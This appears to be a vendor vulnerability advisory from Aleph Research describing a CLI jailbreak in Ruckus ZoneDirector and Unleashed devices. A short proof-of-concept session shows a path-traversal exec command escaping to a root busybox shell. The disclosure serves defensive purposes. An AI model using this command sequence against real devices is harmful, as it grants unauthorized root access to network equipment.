<--

Ruckus CLI (ruckus_cli2) jailbreak

Aleph Research Advisory

Identifier

Severity

Moderate

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Technical Details

This is a command injection vulnerability via a crafted CLI command.

/bin/ruckus_cli2 is a CLI used by Ruckus for user interaction and run commands by their web interface. ruckus_cli2 has a script menu that can run limited set of stored scripts. exec command in that menu is vunrable to path traversal, and can be used to run /bin/sh in order to escape to a busybox shell.

Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.

Proof Of Concept

Jail breaking Ruckus CLI using this exploit

Please login: admin
Password: 
Welcome to Ruckus Unleashed Network Command Line Interface

ruckus> enable 
ruckus# debug 
You have all rights in this mode.
ruckus(debug)# script 
ruckus(script)# exec ../../../bin/sh


Ruckus Wireless ZoneDirector -- Command Line Interface
Enter 'help' for a list of built-in commands.

ruckus$ echo $USER
admin

ruckus$ grep $USER /etc/passwd
admin:$1$-----------:0:0:root:/:/bin/sh

Timeline

Posts

Credit

External References